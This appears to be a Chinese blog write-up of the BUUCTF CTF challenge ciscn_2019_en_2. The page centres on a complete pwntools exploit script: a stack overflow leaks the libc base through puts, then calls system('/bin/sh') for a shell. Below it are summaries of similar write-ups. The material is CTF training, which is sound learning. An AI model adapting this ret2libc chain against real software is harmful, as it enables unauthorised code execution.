ciscn_2019_en_2 ret2libc64

最新推荐文章于 2023-06-21 18:33:33 发布
原创 最新推荐文章于 2023-06-21 18:33:33 发布 · 366 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了CISCN_2019_EN_2挑战中的漏洞利用过程,通过ROP技术构造payload,利用puts函数泄露libc基地址,进而调用system函数执行/bin/sh命令,实现远程代码执行。 
from pwn import *
elf = ELF('./libc-2.23.so')
p = process("./ciscn_2019_en_2")
p.recvuntil('choice!\n')
p.sendline("1")
p.recvuntil('encrypted\n')
poprdiret = 0x0000000000400c83
pltputs = 0x00000000004006E0
gotputs = 0x0000000000602020
ret = 0x00000000004006B9
main = 0x0000000000400B28
payload = 0x58*'a' + p64(poprdiret) + p64(gotputs) + p64(pltputs) + p64(main)
p.sendline(payload)
p.recvuntil('Ciphertext\n')
p.recvuntil('\n')
libcbase = u64(p.recvline()[:-1].ljust(8, '\x00')) - elf.symbols['puts']
log.success(hex(libcbase))

systemaddr = libcbase + elf.symbols['system']
binsh = libcbase + elf.search("/bin/sh\x00").next()
payload = 0x58*'a' + p64(ret) + p64(poprdiret) + p64(binsh) + p64(systemaddr) + p64(main)
p.recvuntil('choice!\n')
p.sendline("1")
p.recvuntil('encrypted\n')
p.sendline(payload)
p.interactive()
[BUUCTF] ciscn_2019_en_2
a3314019530的博客
08-25 345
程序里面既没有现成的system也没有/bin/sh字符串。所以思路应该是通过put函数泄露libc地址,然后拿到system函数和/bin/sh字符串实现攻击。用ida查看一下,只有输入1进入encrypt()函数内,然后利用gets函数可以实现栈溢出攻击。64位程序,开了NX保护。先checksec一下。
ciscn_2019_en_2
m0sway的博客
03-25 1755
ciscn_2019_en_2 WriteUp BUU_PWN
[BUUCTF]PWN9——ciscn_2019_en_2
mcmuyanga的博客
08-26 765
[BUUCTF]PWN9——ciscn_2019_en_2 题目网址:https://buuoj.cn/challenges#ciscn_2019_en_2 步骤: 例行检查,64位,开启了NX保护 nc一下看看程序的执行大概流程,看这个模样很眼熟 ida查看了一下程序,确定了跟之前的 [BUUCTF]PWN6——ciscn_2019_c_1 一样,具体的看那题的链接 exp: from pwn import* from LibcSearcher import* r=remote('node3.buu
BUUCTF ciscn_2019_en_2
carol2358的博客
04-09 2698
这题整体的思路是ret2libc 先checksec 理一下题目: 只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_l...
BUU刷题-Pwn-ciscn_2019_en_2(和BUU刷题ciscn_2019_c_1为同一题)
一个啥也不会的小菜鸡!
06-21 270
是一个菜单题,有一个栈溢出漏洞,但里面有字符串加密逻辑,绕过后才可以使用栈溢出。而且本题中没有后门函数等,所以需要自己去寻找,首先泄露除一个函数地址,进而计算出system和“/bin/sh”的位置。通过ROPgadget --binary ciscn_2019_c_1 >gadgets。-》puts_got_addr的地址。-》puts_plt_addr的地址。通过IDA测算栈溢出距离:0x50。[[ROPgadget的使用]]获取pop_rdi_ret片段。[[Stack上函数传参]]
[CTF]BUUCTF-PWN-ciscn_2019_en_2
weixin_53394081的博客
04-11 468
【CTF】BUUCTF-ciscn_2019_en_2 pwn
buuctf|ciscn_2019_en_2 1
m0_64236521的博客
05-02 764
ciscn_2019_en_2 1 下载后我重命名为pwn_14了 checksec一下 nx开启,可以栈溢出 64位,用ida看看 分析下,只有输入‘1’有用,即encrypt函数较为重要,进入encrypt 有gets(s),可以进行栈溢出,没有找到后门函数。 那基本思路有了,这里可以栈溢出,但要绕过strlen判断,之后就是基本的ROP,ret2libc。 exp如下 from pwn import* from LibcSearcher import* context(os='linux', ar
[BUUCTF-pwn]——ciscn_2019_en_2
Y_peak的博客
02-10 935
[BUUCTF-pwn]——ciscn_2019_en_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_en_2 题目: 这是一道和之前一摸一样的题,请点击
BUUCTF-PWN-ciscn_2019_en_2
Henlenl的博客
05-19 313
文章目录查看文件信息IDA 分析exp 查看文件信息 amd 64位系统 NX保护 IDA 分析 nc 程序连接一下 没什么东西 给了几个选择的按钮 IDA 64分析一波 发现其实程序就只能选择1 而且关键函数是encrypt 我们进去看一下 所以 只要让 var[13] = 17就行了 exp 但是 这里要说明一下 32位程序是能直接去内存中寻址执行的 64位就是要依靠寄存器来寻址 然后找到地址返回给程序去执行的 ...
【BUUCTF - PWN】ciscn_2019_en_2
古月浪子的博客
03-25 1273
不知道是不是题目重复了,反正我的另一篇博文的exp可以直接copy过来打通… 传送门:【BUUCTF - PWN】ciscn_2019_c_1 附件:ciscn_2019_en_2
【CTF】ciscn_2019_en_2
凉水的博客
01-26 3976
解题思路: 1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分): void encrypt(char *__block,int __edflag) { size_t sVar1; long lVar2; ulong uVar3; undefined8 *puVar4; undefined8 local_58 [9]; ... *(undefined2 *)puVar4 = 0; puts("Input your Plaintext to be encr
深入理解ret2libc攻击:无壳代码控制
在IT安全领域,"Performing a ret2libc Attack-InVoLuNTaRy" 是一篇关于高级攻击技术的教程,主要讲解如何利用ret2libc(Return to Library Call)漏洞进行攻击。ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值